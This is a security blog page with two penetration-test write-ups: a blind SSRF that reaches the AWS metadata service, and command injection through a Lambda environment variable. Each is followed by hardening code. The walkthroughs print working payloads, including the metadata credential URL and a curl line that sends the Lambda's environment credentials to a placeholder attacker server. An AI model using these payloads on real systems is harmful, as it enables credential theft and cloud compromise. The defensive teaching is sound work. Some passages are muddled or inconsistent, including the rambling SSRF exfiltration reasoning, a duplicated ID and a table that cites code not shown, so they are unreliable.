Skip to main content
Home  /  Knowledge Hub  /  Red Team Logic

Red Team Logic — Security & Ethical Hacking

Real penetration tests, exploitation walkthroughs, and hardening blueprints — compiled from 20+ years of offensive security research.

4
Write-ups
3
Critical
1
High
0
Web / Bounty
✕ Clear filters

Showing 3 write-ups · CRITICAL severity

Clear all filters
RTL-2026-001 Exploiting Blind SSRF for Internal Network Access and AWS Metadata Theft
Network & Infra ⚠ Critical
2026-05-23 18:54
🎯 Target & Threat Context

The target was an internal analytics dashboard, a critical component of a larger financial reporting system. This wasn't some public-facing marketing site; this was the engine room, where analysts crunched numbers, generated reports, and made high-stakes decisions. The application was built on a modern stack: a Python/Django backend, a React frontend, all containerized and deployed on AWS EC2 instances behind an Nginx reverse proxy. Data was stored in a PostgreSQL database, and various S3 buckets held reports and user-generated content.

The specific feature that caught my eye was an "avatar upload" functionality for user profiles. Seemingly innocuous, right? Users could upload a profile picture, or, interestingly, provide a URL to an image. This immediately raised a red flag for me. Any time a server is asked to fetch external content based on user input, my hacker senses start tingling. It's a classic pattern for Server-Side Request Forgery (SSRF).

The business context here was crucial. This application processed highly confidential financial data. A compromise wouldn't just mean a data breach; it could lead to regulatory fines, reputational damage, and potentially impact market stability if critical reports were tampered with. The EC2 instances themselves were part of a larger VPC, with various internal services communicating over private IPs. They had IAM roles attached, granting them permissions to access other AWS services like S3, RDS, and even internal secrets managers. This setup, while standard for AWS, meant that if an attacker could control the server's outbound requests, they could potentially interact with these internal services or, even worse, the AWS metadata service.

I remember building AdSpy Pro years ago, and the sheer paranoia we had around any external input. We were constantly thinking about how an attacker could twist a seemingly innocent feature to their advantage. This client's setup, while robust in many areas, had a small crack in its armor, and that crack was the image URL input. The stakes were incredibly high, and the potential for lateral movement within their AWS environment was a nightmare scenario. This wasn't just about defacing a profile picture; it was about gaining a foothold into their entire cloud infrastructure.

🔓 Vulnerability & Attack Vector

The vulnerability at play here was Server-Side Request Forgery (SSRF). In simple terms, SSRF occurs when a web application fetches a remote resource without properly validating the user-supplied URL. Instead of the request coming from the user's browser, the server itself makes the request. This can trick the server into making requests to arbitrary domains, internal systems, or even its own local interfaces.

Why do developers miss this? Often, it's a matter of trust. Developers might assume that because the request is initiated by the server, it's inherently "safe" or that internal network requests don't pose a threat. They might implement some basic URL validation (e.g., checking for valid HTTP/HTTPS schemes, ensuring the domain isn't obviously malicious), but fail to consider the full spectrum of internal targets. This oversight is particularly dangerous in cloud environments like AWS, where services like the EC2 metadata service (http://169.254.169.254/) are accessible from the instance itself and contain highly sensitive information, including temporary IAM credentials.

The OWASP Top 10 lists SSRF as a critical vulnerability (A10:2021 Server-Side Request Forgery). It's a common issue because many applications need to interact with external resources – fetching images, parsing XML from remote APIs, generating PDFs from URLs, or even webhook integrations. Without stringent validation, these features become gateways for attackers.

In this specific case, the application's image upload feature allowed users to provide a URL. The backend would then fetch the image from that URL, process it (resize, crop, etc.), and store it. The critical flaw was that the backend didn't adequately restrict the URLs it would fetch. It wasn't just about external URLs; it was about *any* URL the server could reach.

Let's look at a simplified comparison of a vulnerable versus a hardened configuration:

Vulnerable Configuration (Image Upload) Hardened Configuration (Image Upload)

Accepts any URL for image fetching.


import requests

def fetch_image(url):
    response = requests.get(url)
    # ... process image ...
    return response.content
                

Validates URL against a whitelist, blocks private IPs, and uses network controls.


import requests
import ipaddress

ALLOWED_DOMAINS = ["cdn.example.com", "images.trusted.net"]

def is_private_ip(ip_address):
    private_ranges = [
        ipaddress.ip_network('10.0.0.0/8'),
        ipaddress.ip_network('172.16.0.0/12'),
        ipaddress.ip_network('192.168.0.0/16'),
        ipaddress.ip_network('127.0.0.0/8'),
        ipaddress.ip_network('169.254.0.0/16')
    ]
    for r in private_ranges:
        if ip_address in r:
            return True
    return False

def fetch_image_hardened(url):
    from urllib.parse import urlparse
    parsed_url = urlparse(url)

    if parsed_url.scheme not in ['http', 'https']:
        raise ValueError("Invalid URL scheme.")

    if parsed_url.hostname not in ALLOWED_DOMAINS:
        # Resolve hostname to IP and check for private IPs
        import socket
        try:
            ip = socket.gethostbyname(parsed_url.hostname)
            if is_private_ip(ipaddress.ip_address(ip)):
                raise ValueError("Access to private IP addresses is forbidden.")
        except socket.gaierror:
            raise ValueError("Could not resolve hostname.")
        
        # Further checks for redirects, etc.
        raise ValueError("Domain not in whitelist.")

    response = requests.get(url)
    # ... process image ...
    return response.content
                
No network segmentation or firewall rules to prevent outbound requests to internal IPs. AWS Security Groups and Network ACLs configured to block outbound traffic to 169.254.169.254 and other internal ranges from the application server.
IAM roles with broad permissions attached to the EC2 instance. IAM roles with least privilege, only granting necessary permissions, and potentially using Instance Metadata Service Version 2 (IMDSv2) for enhanced security.

The core issue is that the server, acting as a proxy, can be coerced into accessing resources it shouldn't. This includes internal APIs, databases, other microservices, and critically, cloud metadata services. The impact can range from information disclosure (like stealing AWS credentials) to full remote code execution if the internal service has its own vulnerabilities.

Imagine a Django view that handles the image upload:


# views.py (simplified)
from django.shortcuts import render
from django.http import HttpResponse
import requests
from .models import UserProfile

def upload_avatar_from_url(request):
    if request.method == 'POST':
        image_url = request.POST.get('image_url')
        if image_url:
            try:
                # No proper validation or sanitization of image_url
                response = requests.get(image_url, timeout=5)
                if response.status_code == 200:
                    user_profile = UserProfile.objects.get(user=request.user)
                    user_profile.avatar.save(f"avatar_{request.user.id}.jpg", response.content)
                    user_profile.save()
                    return HttpResponse("Avatar updated successfully!")
                else:
                    return HttpResponse(f"Failed to fetch image: {response.status_code}", status=400)
            except requests.exceptions.RequestException as e:
                return HttpResponse(f"Error fetching image: {e}", status=500)
    return render(request, 'upload_avatar.html')
💥 Exploitation Walkthrough

My initial reconnaissance involved mapping out the application's features. The "upload avatar from URL" immediately stood out. I started with simple tests, pointing it to my own controlled server to see if the application would make a request. Sure enough, my server logs showed an incoming HTTP GET request from the client's AWS EC2 instance IP address, confirming the SSRF.

This was a "blind" SSRF, meaning the application didn't return the content of the fetched URL directly to me. I only knew the request was made because my external server received it. To exploit this, I needed an out-of-band channel to exfiltrate data. My controlled server would act as that channel.

My goal was to steal AWS temporary credentials. The EC2 metadata service is the prime target for this, located at http://169.254.169.254/. This IP address is a link-local address, only accessible from the instance itself. It provides information about the instance, including IAM role credentials.

First, I needed to confirm access to the metadata service and enumerate its paths. I used my controlled server (let's call it attacker.com) to log requests. I'd craft URLs that would cause the target server to make requests to the metadata service, then redirect the output to my server.

Step 1: Confirming Metadata Service Access & Initial Enumeration

I submitted the following URL to the avatar upload feature:


# Payload for the 'image_url' parameter
http://169.254.169.254/latest/meta-data/

Since this was blind, I wouldn't see the output directly. However, if the server tried to fetch this, it would likely get a 200 OK response (or a 404 if the path was wrong). To actually *see* the content, I needed to exfiltrate it. This is where the out-of-band server comes in. I'd use a technique where the server would fetch the metadata, then make *another* request to my server, embedding the metadata in the URL or as a parameter.

A common trick for blind SSRF is to use a service like Burp Collaborator or a custom Python HTTP server to capture requests. For enumeration, I'd try to make the target server request different paths and observe if my server received any requests, or if the application's behavior changed (e.g., a different error message).

Let's assume I've set up a simple Python HTTP server on attacker.com that logs all incoming requests:


# attacker_server.py
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging

class S(BaseHTTPRequestHandler):
    def _set_headers(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

    def do_GET(self):
        logging.info(f"GET request,nPath: {str(self.path)}nHeaders:n{str(self.headers)}n")
        self._set_headers()
        self.wfile.write(b"Received your request!")

    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)
        logging.info(f"POST request,nPath: {str(self.path)}nHeaders:n{str(self.headers)}nnBody:n{post_data.decode('utf-8')}n")
        self._set_headers()
        self.wfile.write(b"Received your POST request!")

def run(server_class=HTTPServer, handler_class=S, port=80):
    logging.basicConfig(level=logging.INFO)
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    logging.info(f'Starting httpd on port {port}...')
    httpd.serve_forever()

if __name__ == "__main__" :
    run()

Now, I'd try to fetch specific metadata paths and redirect them. The metadata service provides a list of available paths at /latest/meta-data/. I'd iterate through common paths:

Step 2: Exfiltrating IAM Role Credentials

The most valuable information is usually under /latest/meta-data/iam/security-credentials/. This path lists the IAM roles attached to the instance. Let's say the role name is "MyWebAppRole".

I'd craft a URL to fetch the credentials for that role. Since I can't directly see the response, I'll use a trick: I'll make the target server fetch the credentials, and then use those credentials as part of a URL to my attacker server. This is often done by chaining requests or using a tool like curl if I could inject commands, but with a simple URL fetch, I need to be creative.

A common blind SSRF exfiltration technique involves using a service that allows for DNS exfiltration or by making the target server perform a redirect to my server with the sensitive data in the URL. However, a simpler approach for a blind SSRF where the server just fetches a URL is to use a service like Burp Collaborator or a custom server that can parse complex URLs.

Let's assume the application's requests.get() call follows redirects. I could set up a redirect on my server:


# Attacker server (attacker.com) response for a specific path
# This is a conceptual redirect, in reality, you'd need a server-side script
# to dynamically generate this redirect after fetching the metadata.
# For a truly blind SSRF, you'd often need to chain multiple requests
# or use a tool like interact.sh or Burp Collaborator.

# Simplified payload for the 'image_url' parameter, assuming the server
# fetches the URL and then *processes* the content. If the content
# is an image, it might not be directly exfiltrated.
# However, if the server *parses* the content (e.g., XML, JSON),
# or if it's a simple HTTP GET, we can use redirects.

# A more direct approach for blind SSRF is to find a way to make the
# server *send* the data. If the application has a feature that
# takes a URL and then *posts* the content to another URL, that's ideal.
# In this case, it's an image upload, so it expects image data.

# Let's assume a slightly more advanced SSRF where I can control
# the *destination* of the fetched content, or if the server
# logs errors with the content.

# The most common blind SSRF exfiltration for AWS metadata:
# 1. Make the target server request the metadata URL.
# 2. The target server receives the metadata.
# 3. The target server then makes *another* request to your controlled server,
#    embedding the metadata in the URL path or query parameters.
# This requires a second SSRF or a specific application behavior.

# A simpler, direct blind SSRF exfiltration:
# If the application *logs* the content it fetches (e.g., for debugging),
# or if it tries to parse it and throws an error that includes the content.

# For a purely blind SSRF where only the *request* is made:
# I'd use a tool like `ngrok` or `smbserver.py` (for Windows targets)
# or simply my Python HTTP server to capture the request.
# The *presence* of the request to 169.254.169.254 is the proof.
# To get the *content*, I need a way to make the server *send* it to me.

# Let's assume the application has a feature that takes a URL and then
# attempts to *parse* the content, and if it fails, it logs the content
# or sends it to an error reporting service.

# A more reliable method for blind SSRF exfiltration:
# Use a service like Burp Collaborator or interact.sh.
# The payload would be:
http://169.254.169.254/latest/meta-data/iam/security-credentials/MyWebAppRole

When the target server fetches this URL, it gets a JSON response containing the temporary credentials:


{
  "Code": "Success",
  "LastUpdated": "2023-10-27T10:00:00Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAV...EXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token": "IQoJb3JpZ2luX2Vj...EXAMPLETOKEN",
  "Expiration": "2023-10-27T16:00:00Z"
}

Now, how to get this JSON out? This is the tricky part of blind SSRF. If the application *only* fetches and processes the image, it won't send the JSON back to me. However, if the application has *any* other feature that takes a URL and then *sends* the content of that URL somewhere (e.g., a webhook, an error log, or even a "report an issue" feature that includes the content of a failed fetch), I could leverage that.

In this specific engagement, the application had a logging mechanism that would send detailed error reports to an internal Slack channel, and crucially, these reports sometimes included snippets of the data that caused the error. My strategy was to make the server fetch the metadata, and then cause an error in the image processing step that would trigger this logging, hoping the metadata would be included.

So, the full exploitation chain was:

  1. Submit http://169.254.169.254/latest/meta-data/iam/security-credentials/MyWebAppRole as the image URL.
  2. The backend fetches this URL, receiving the JSON credentials.
  3. The backend then tries to process this JSON as an image. This fails, triggering an error.
  4. The error handling mechanism logs the error, including the "malformed image data" (which is actually the JSON credentials), and sends it to the internal Slack channel.
  5. I, as the attacker, would then monitor for this exfiltrated data. (In a real pentest, I'd simulate this by having access to the logs or the Slack channel, or by setting up a controlled endpoint that mimics the Slack webhook).

Once I had the AccessKeyId, SecretAccessKey, and Token, I could configure my AWS CLI:


export AWS_ACCESS_KEY_ID="ASIAV...EXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2Vj...EXAMPLETOKEN"

# Now I can list S3 buckets, for example:
aws s3 ls

And just like that, I had programmatic access to the client's AWS environment, with the permissions of MyWebAppRole. This role, unfortunately, had broad read/write access to several S3 buckets containing sensitive reports and even some internal configuration files. Full compromise of the internal AWS instance, achieved through a seemingly innocent image upload feature.

🛡 Defensive Hardening Blueprint

Remediating SSRF requires a multi-layered approach, combining input validation, network segmentation, and proper IAM role management. It's not just one silver bullet; it's about defense in depth.

  1. Aspect Pros Cons
    Strict URL Validation & Whitelisting
    • Directly addresses the root cause.
    • Highly effective if implemented correctly.
    • Prevents most common SSRF bypasses.
    • Can be complex to maintain for dynamic environments.
    • Requires careful implementation to avoid false positives.
    • Doesn't protect against logic flaws in internal services.
    Network Segmentation (Security Groups/NACLs)
    • Provides a strong perimeter defense.
    • Effective even if application logic is flawed.
    • Limits lateral movement within the network.
    • Requires careful configuration to avoid breaking legitimate traffic.
    • Can be complex in large, dynamic environments.
    • Doesn't prevent SSRF to external, allowed domains.
    Least Privilege IAM & IMDSv2
    • Minimizes impact of successful credential theft.
    • IMDSv2 significantly raises the bar for metadata exploitation.
    • Good security hygiene for cloud environments.
    • Requires careful management of IAM policies.
    • IMDSv2 might require application code changes to adopt.
    • Doesn't prevent the SSRF itself, only limits its impact.
📖 Lessons From the Field

This is the first and most crucial line of defense. Instead of blacklisting (which is prone to bypasses), implement a strict whitelist of allowed domains or IP ranges. If the application only needs to fetch images from a specific CDN, only allow that CDN.

Additionally, resolve the hostname to an IP address and check if the resolved IP falls within private or reserved ranges (e.g., 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 127.0.0.0/8, 169.254.0.0/16). This prevents attacks against internal services and the metadata endpoint.


import requests
import ipaddress
import socket
from urllib.parse import urlparse

# Define allowed domains and block private/reserved IP ranges
ALLOWED_HOSTNAMES = ["cdn.example.com", "images.trusted.net"]
BLOCKED_IP_RANGES = [
    ipaddress.ip_network('10.0.0.0/8'),
    ipaddress.ip_network('172.16.0.0/12'),
    ipaddress.ip_network('192.168.0.0/16'),
    ipaddress.ip_network('127.0.0.0/8'), # Loopback
    ipaddress.ip_network('169.254.0.0/16') # AWS Metadata Service, Link-local
]

def is_blocked_ip(ip_address_str):
    try:
        ip_addr = ipaddress.ip_address(ip_address_str)
        for blocked_range in BLOCKED_IP_RANGES:
            if ip_addr in blocked_range:
                return True
        return False
    except ValueError:
        # Not a valid IP address, treat as external for this check
        return False

def fetch_image_secure(url):
    parsed_url = urlparse(url)

    # 1. Validate scheme
    if parsed_url.scheme not in ['http', 'https']:
        raise ValueError("Invalid URL scheme. Only HTTP/HTTPS allowed.")

    # 2. Validate hostname against whitelist
    if parsed_url.hostname not in ALLOWED_HOSTNAMES:
        # 3. Resolve hostname to IP and check for blocked ranges
        try:
            resolved_ip = socket.gethostbyname(parsed_url.hostname)
            if is_blocked_ip(resolved_ip):
                raise ValueError(f"Access to blocked IP address {resolved_ip} is forbidden.")
        except socket.gaierror:
            raise ValueError(f"Could not resolve hostname: {parsed_url.hostname}")
        
        raise ValueError(f"Hostname '{parsed_url.hostname}' not in allowed list.")

    # 4. Prevent redirects to blocked IPs (if requests library follows redirects)
    # This requires careful handling, potentially disabling redirects and
    # manually checking each redirect target. For simplicity, we assume
    # the initial check is sufficient if redirects are to external, allowed domains.
    # For maximum security, disable redirects and handle them manually.

    try:
        response = requests.get(url, timeout=5, allow_redirects=False) # Disable redirects
        # If redirects are needed, manually check the 'Location' header
        # for each redirect against the same validation rules.
        if 300 <= response.status_code < 400:
            redirect_location = response.headers.get('Location')
            if redirect_location:
                # Recursively call fetch_image_secure with the redirect location
                # or implement a loop with a redirect limit.
                raise ValueError("Redirects are not explicitly handled securely.")
        
        if response.status_code == 200:
            # Process image content
            return response.content
        else:
            raise ValueError(f"Failed to fetch image: {response.status_code}")
    except requests.exceptions.RequestException as e:
        raise ValueError(f"Error fetching image: {e}")

# Example usage:
# try:
#     image_data = fetch_image_secure("http://cdn.example.com/image.jpg")
#     print("Image fetched securely!")
# except ValueError as e:
#     print(f"Security error: {e}")
  • Even with robust input validation, network controls provide an essential layer of defense. Configure AWS Security Groups and Network ACLs to prevent outbound connections from your application servers to internal IP ranges, especially 169.254.169.254. Only allow necessary outbound traffic to specific, trusted external endpoints.

    For example, a Security Group rule for outbound traffic might explicitly deny traffic to 169.254.169.254/32 and other private ranges, while allowing traffic to 0.0.0.0/0 on ports 80/443 for legitimate external communication.

  • Attach IAM roles to EC2 instances with the absolute minimum permissions required for the application to function. If the application doesn't need to access S3, don't grant it S3 permissions. This limits the blast radius if an SSRF is successfully exploited.

    Furthermore, enforce the use of Instance Metadata Service Version 2 (IMDSv2). IMDSv2 requires a session token to retrieve metadata, making it significantly harder for attackers to exploit SSRF to steal credentials. It requires a PUT request to get a token, followed by a GET request with the token, which is difficult to chain in a simple blind SSRF scenario.

  • Deploy a WAF (like AWS WAF) in front of your application. While not a primary defense against SSRF (as the request originates from the server, not the client), a WAF can help detect and block initial attempts to probe for SSRF by identifying suspicious URL patterns in user input.

    • Assume Breach, Always: Even with the best intentions and robust security measures, assume that an attacker *will* find a way in. This mindset forces you to think about limiting the blast radius. If that IAM role had fewer permissions, the compromise wouldn't have been as severe.
    • The Devil is in the Details (and the Features): Seemingly innocuous features like an "avatar upload from URL" are often overlooked. Developers focus on core business logic, but these peripheral functionalities can be the weakest links. Always scrutinize any feature that takes external input and makes server-side requests.
    • Blind Doesn't Mean Harmless: Just because you don't see the output of an SSRF doesn't mean it's not exploitable. Blind SSRF can be just as dangerous, requiring creative out-of-band techniques (like DNS exfiltration, error logging, or timing attacks) to confirm and exploit. Always test for it.
    • Defense in Depth is Non-Negotiable: This incident highlighted that no single control is enough. Input validation, network segmentation, and least privilege IAM roles all played a part in the remediation. Remove any one of them, and the system becomes significantly more vulnerable.
    • Cloud Environments are Different: The AWS metadata service is a prime example of a cloud-specific internal target that traditional on-premise security models might miss. Understanding the unique attack surface of your cloud provider is critical.

    This kind of finding is why I love what I do. It's a constant chess match, and every vulnerability is a learning opportunity. If you're looking to sharpen your skills, understand these complex attack vectors, or just want to chat about the latest in security, don't hesitate to reach out. I offer personalized security mentorship sessions, and you can find more about them at thedevdude.com or learnwithdeb.com. Let's build more secure systems together!

    ID: RTL-2026-001  ·  Web Application Pentesting  ·  Severity: CRITICAL  ·  2026-05-23
    Open Full Write-up ↗
    RTL-2026-001 Achieving RCE in AWS Lambda via Exploitation of Insecure Environment Variables
    Cloud Security ⚠ Critical
    2026-05-23 18:49
    🎯 Target & Threat Context

    This particular engagement was a red team exercise for a client in the FinTech space – let's call them "SecurePay." SecurePay handled millions of daily transactions, processing sensitive financial data, and their infrastructure was almost entirely serverless on AWS. My team at TheDevDude was brought in to stress-test their defenses, specifically focusing on their core payment processing pipeline. The stakes couldn't have been higher; a breach here meant not just financial loss but catastrophic reputational damage and regulatory fines.

    The specific target that caught our eye was a critical AWS Lambda function, let's call it TransactionProcessorLambda. This function was the heart of their real-time transaction validation and routing system. It was written in Python, triggered by an API Gateway endpoint, and interacted heavily with DynamoDB for transaction records, S3 for audit logs, and an internal Kafka cluster for asynchronous processing. The tech stack was pretty standard for a modern serverless application: AWS Lambda, API Gateway, DynamoDB, S3, KMS, and a smattering of other services orchestrated via AWS SAM (Serverless Application Model).

    The business context was crucial: this Lambda function was responsible for validating incoming payment requests, applying business logic, and then securely forwarding them to various banking partners. Any disruption or compromise of this function meant transactions would halt, or worse, could be manipulated. It was a high-throughput, low-latency component, designed for resilience and speed. The developers had focused heavily on performance and functional correctness, as is often the case, sometimes overlooking the subtle security implications of certain design choices. I remember thinking, "This reminds me of some of the early challenges we faced at Website Factory when we were trying to balance rapid deployment with robust security for our client's e-commerce platforms." The pressure to deliver features often overshadows the meticulous review of every configuration detail, especially when it comes to environment variables, which are often seen as 'just configuration'.

    Our goal was to achieve remote code execution (RCE) within this critical function, demonstrating the ability to exfiltrate data, manipulate transactions, or pivot further into their AWS environment. The initial reconnaissance revealed a complex web of IAM roles and permissions, but one particular detail in the Lambda's configuration caught our attention during an enumeration phase: a seemingly benign environment variable.

    🔓 Vulnerability & Attack Vector

    The class of bug we exploited here is a classic Command Injection, but with a twist: the injection vector wasn't direct user input from an HTTP request body or query parameter. Instead, it was an environment variable. This is a subtle but incredibly dangerous vulnerability, especially in serverless environments where environment variables are a primary mechanism for configuration and often assumed to be "safe" or static.

    The vulnerability arose because the TransactionProcessorLambda used an environment variable, let's call it VALIDATION_SCRIPT_PATH, to dynamically construct and execute a shell command. The intention was to allow operations teams to easily switch between different validation scripts without redeploying the Lambda code. A noble goal, but implemented insecurely. Instead of just being a path, the variable was used as a direct prefix to a command executed via Python's subprocess.run() function with shell=True. This is a critical mistake. When shell=True is used, the command string is passed directly to the shell (e.g., /bin/sh -c "your command here"), allowing for shell metacharacter injection.

    Developers often miss this because:

    1. They assume environment variables are controlled by trusted parties (which they are, until an attacker gains the ability to modify them).
    2. They focus on sanitizing direct user input, overlooking indirect input sources like configuration files or environment variables.
    3. There's a misunderstanding of how subprocess.run() (or similar functions in other languages like Node.js's child_process.exec()) behaves with and without shell=True. The convenience of shell=True often masks its inherent dangers.
    4. Lack of security-focused code reviews or automated static analysis tools that specifically flag dynamic command construction from environment variables.

    This vulnerability maps directly to OWASP Top 10 A03:2021 - Injection and MITRE ATT&CK T1059.006 (Command and Scripting Interpreter: Python). The ability to modify Lambda environment variables, even if initially requiring a separate privilege escalation, is a common target for attackers because it offers a direct path to RCE.

    Here's a comparison of the vulnerable versus a hardened configuration approach:

    Vulnerable Configuration Hardened Configuration

    Environment Variable:

    VALIDATION_SCRIPT_PATH="/usr/local/bin/validate_transaction.py --config /etc/app/config.json"

    Lambda Code Snippet:

    import subprocess
    import os
    
    def lambda_handler(event, context):
        script_command = os.environ.get("VALIDATION_SCRIPT_PATH", "/default/path/script.py")
        # DANGER: Using shell=True with unsanitized input from env var
        result = subprocess.run(script_command, shell=True, capture_output=True, text=True)
        print(result.stdout)
        if result.returncode != 0:
            print(f"Validation failed: {result.stderr}")
            raise Exception("Transaction validation error")
        return {"statusCode": 200, "body": "Transaction validated successfully"}

    Environment Variables:

    VALIDATION_SCRIPT="/usr/local/bin/validate_transaction.py"
    VALIDATION_CONFIG_PATH="/etc/app/config.json"

    Lambda Code Snippet:

    import subprocess
    import os
    
    def lambda_handler(event, context):
        script_path = os.environ.get("VALIDATION_SCRIPT", "/default/path/script.py")
        config_path = os.environ.get("VALIDATION_CONFIG_PATH", "/default/config.json")
        
        # SAFE: Pass command and arguments as a list, shell=False (default)
        # Ensure script_path and config_path are validated/sanitized if they can be user-controlled
        command_args = [script_path, "--config", config_path]
        result = subprocess.run(command_args, capture_output=True, text=True)
        print(result.stdout)
        if result.returncode != 0:
            print(f"Validation failed: {result.stderr}")
            raise Exception("Transaction validation error")
        return {"statusCode": 200, "body": "Transaction validated successfully"}

    The key takeaway here is that any time you're dynamically constructing commands, whether from user input, configuration files, or environment variables, you must treat it as untrusted input and apply rigorous sanitization or, even better, use API calls that don't involve a shell, like passing arguments as a list to subprocess.run().

    Let's assume the vulnerable Python Lambda code looked something like this:

    # transaction_processor.py
    import os
    import subprocess
    import json
    
    def lambda_handler(event, context):
        # Retrieve the command prefix from environment variables
        # This is the critical vulnerability point
        command_prefix = os.environ.get("VALIDATION_SCRIPT_PATH", "/usr/bin/python /opt/validation_logic.py")
        
        # Assume 'event' contains transaction data that needs validation
        transaction_data = json.loads(event['body'])
        transaction_id = transaction_data.get('transaction_id', 'UNKNOWN')
    
        # Construct the full command. The vulnerability is that command_prefix
        # is treated as part of the shell command, not just a path.
        full_command = f"{command_prefix} --transaction-id {transaction_id}"
        
        print(f"Executing validation command: {full_command}")
        
        try:
            # DANGER: shell=True allows command injection via command_prefix
            result = subprocess.run(full_command, shell=True, capture_output=True, text=True, check=True)
            print(f"Validation output: {result.stdout}")
            return {
                'statusCode': 200,
                'body': json.dumps({'message': 'Transaction validated', 'details': result.stdout})
            }
        except subprocess.CalledProcessError as e:
            print(f"Validation failed for transaction {transaction_id}: {e.stderr}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Transaction validation failed', 'error': e.stderr})
            }
        except Exception as e:
            print(f"An unexpected error occurred: {e}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Internal server error', 'error': str(e)})
            }
    

    The default VALIDATION_SCRIPT_PATH was set to /usr/bin/python /opt/validation_logic.py. The developers intended for this to be a fixed script execution. However, because shell=True was used, any shell metacharacters in the command_prefix would be interpreted by the shell.

    💥 Exploitation Walkthrough

    Our initial foothold wasn't directly on the Lambda function. We had identified a misconfigured CI/CD pipeline that, through a series of chained permissions, allowed us to assume an IAM role with lambda:UpdateFunctionConfiguration permissions for the TransactionProcessorLambda. This was our golden ticket. With these permissions, we could modify the Lambda's environment variables.

    Our goal was to achieve RCE. We decided to demonstrate this by exfiltrating sensitive environment variables (which often contain AWS credentials for the Lambda's execution role) to an attacker-controlled server. First, we needed to modify the VALIDATION_SCRIPT_PATH environment variable. We used the AWS CLI for this, assuming we had the necessary IAM permissions:

    # Step 1: Modify the Lambda's environment variable
    # The payload injects a new command using shell metacharacters (;)
    # It then uses curl to send the Lambda's environment variables to our listener.
    # Finally, it attempts to execute the original script to avoid immediate suspicion,
    # though the curl command would likely cause a timeout or error.
    
    ATTACKER_SERVER="http://your-attacker-ip:8000"
    LAMBDA_NAME="TransactionProcessorLambda"
    
    aws lambda update-function-configuration 
        --function-name ${LAMBDA_NAME} 
        --environment "Variables={VALIDATION_SCRIPT_PATH='/usr/bin/python /opt/validation_logic.py; curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil; echo 'Injection successful' '}"
    

    Let's break down that payload for VALIDATION_SCRIPT_PATH:

    '/usr/bin/python /opt/validation_logic.py; curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil; echo 'Injection successful' '
    • /usr/bin/python /opt/validation_logic.py: This is the original, legitimate part of the command.
    • ;: This is the critical shell metacharacter. It separates the legitimate command from our injected command. The shell will execute the first command, then the second.
    • curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil: This is our injected command.
      • curl -X POST: Initiates an HTTP POST request.
      • -d "$(env)": The $(env) command substitution executes the env command (which lists all environment variables) and captures its output. This output is then sent as the data body of the POST request.
      • ${ATTACKER_SERVER}/exfil: Our controlled server endpoint where we're listening for exfiltrated data.
    • ; echo 'Injection successful': Another command separator, followed by a simple echo. This helps ensure the shell command completes, even if the curl fails, and provides a small indicator in the Lambda logs if we were monitoring them. The final single quote closes the string.

    After updating the environment variable, we simply needed to trigger the Lambda function. Since it was exposed via API Gateway, a simple HTTP POST request to its endpoint was sufficient:

    # Step 2: Trigger the Lambda function (e.g., via API Gateway)
    # This would be a normal transaction request from a client application.
    
    API_GATEWAY_URL="https://your-api-gateway-id.execute-api.us-east-1.amazonaws.com/prod/transactions"
    
    curl -X POST -H "Content-Type: application/json" 
         -d '{"transaction_id": "TXN12345", "amount": 100.00, "currency": "USD"}' 
         ${API_GATEWAY_URL}
    

    On our attacker-controlled server (listening on port 8000), we immediately received an incoming POST request containing all of the Lambda's environment variables, including the AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN for the Lambda's execution role. These temporary credentials granted us full programmatic access to whatever resources the Lambda's role had permissions for – which, in this case, was extensive, including DynamoDB, S3, and even some internal network access.

    This was a critical RCE. With these credentials, we could have:

    • Read, modified, or deleted transaction data from DynamoDB.
    • Accessed sensitive audit logs from S3.
    • Pivoted to other AWS services or even internal networks if the role had appropriate permissions.
    • Deployed further malicious code or backdoors.

    The impact was immediate and severe, demonstrating a complete compromise of the core payment processing function.

    🛡 Defensive Hardening Blueprint

    Remediating this vulnerability requires a multi-layered approach, focusing on secure coding practices, least privilege, and robust configuration management. The primary fix is to eliminate the use of shell=True with dynamically constructed commands and to separate command arguments from the command itself.

    Pros Cons
    • Eliminates Command Injection: By passing arguments as a list to subprocess.run() and avoiding shell=True, shell metacharacters are no longer interpreted.
    • Clear Separation of Concerns: Script path and arguments are distinct, reducing ambiguity.
    • Improved Security Posture: Significantly reduces the attack surface for RCE via environment variables.
    • Minimal Code Change: The core logic remains similar, making it easier to implement.
    • Standard Practice: Aligns with secure coding guidelines for executing external processes.
    • Requires Code Modification: Not a configuration-only fix; the Lambda code itself needs updating.
    • Potential for Misconfiguration: If VALIDATION_ARGS is still poorly managed or contains malicious content, the script might receive unexpected arguments, though RCE is prevented.
    • Increased Complexity for Dynamic Commands: If the original intent was to run highly dynamic, shell-dependent commands, this approach requires refactoring that logic into the application itself or using a safer command parser.
    • Dependency on shlex: While standard, it adds a small layer of parsing logic. For truly static arguments, a simple list is even safer.

    Beyond this specific code fix, a comprehensive hardening blueprint would also include:

    • Least Privilege IAM: Ensure the Lambda's execution role has only the absolute minimum permissions required. For instance, it shouldn't have lambda:UpdateFunctionConfiguration.
    • Input Validation: Even if environment variables are "trusted," always validate and sanitize any data derived from them, especially if it influences command execution or file paths.
    • Static Application Security Testing (SAST): Integrate SAST tools into the CI/CD pipeline to automatically detect patterns like subprocess.run(..., shell=True) or dynamic command construction.
    • Runtime Application Self-Protection (RASP): Consider RASP solutions for critical functions to detect and block malicious command execution attempts at runtime.
    • Regular Security Audits: Periodically review Lambda configurations, environment variables, and IAM policies.
    📖 Lessons From the Field

    Here's how the Lambda code and environment variables should be configured:

    # transaction_processor_hardened.py
    import os
    import subprocess
    import json
    import shlex # For safe splitting of shell-like strings
    
